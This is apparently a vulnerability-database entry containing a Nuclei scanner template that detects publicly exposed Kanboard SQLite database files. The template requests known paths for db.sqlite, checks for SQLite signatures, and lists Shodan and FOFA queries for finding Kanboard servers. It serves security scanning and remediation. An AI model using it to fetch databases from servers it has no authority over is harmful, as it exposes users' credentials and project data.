漏洞描述
Detected Kanboard SQLite database file was found to be exposed, containing sensitive information including user credentials, project data, tasks, and comments.
kanboard-database-exposure: Kanboard - SQLite Database Exposure
PoC代码[已公开]
id: kanboard-database-exposure
info:
name: Kanboard - SQLite Database Exposure
author: 0x_Akoko
severity: high
description: |
Detected Kanboard SQLite database file was found to be exposed, containing sensitive information including user credentials, project data, tasks, and comments.
reference:
- https://docs.kanboard.org/v1/admin/sqlite/
- https://kanboard.org/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
verified: true
max-request: 2
shodan-query: http.title:"Kanboard"
fofa-query: title="Kanboard"
tags: kanboard,exposure,database,sqlite,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/data/db.sqlite"
- "{{BaseURL}}/kanboard/data/db.sqlite"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "SQLite format 3", "CREATE TABLE", "INTEGER PRIMARY KEY")'
condition: and
# digest: 490a004630440220243aadc0d57b76872dbefb93cdbb06202ab4c8e57931a52788f59e5e36ef4a1502205a98de48a233070bbac853f8efef8068c148f2979604d70d8582c659dd49ffe4:922c64590222798bb761d5b6d8e72950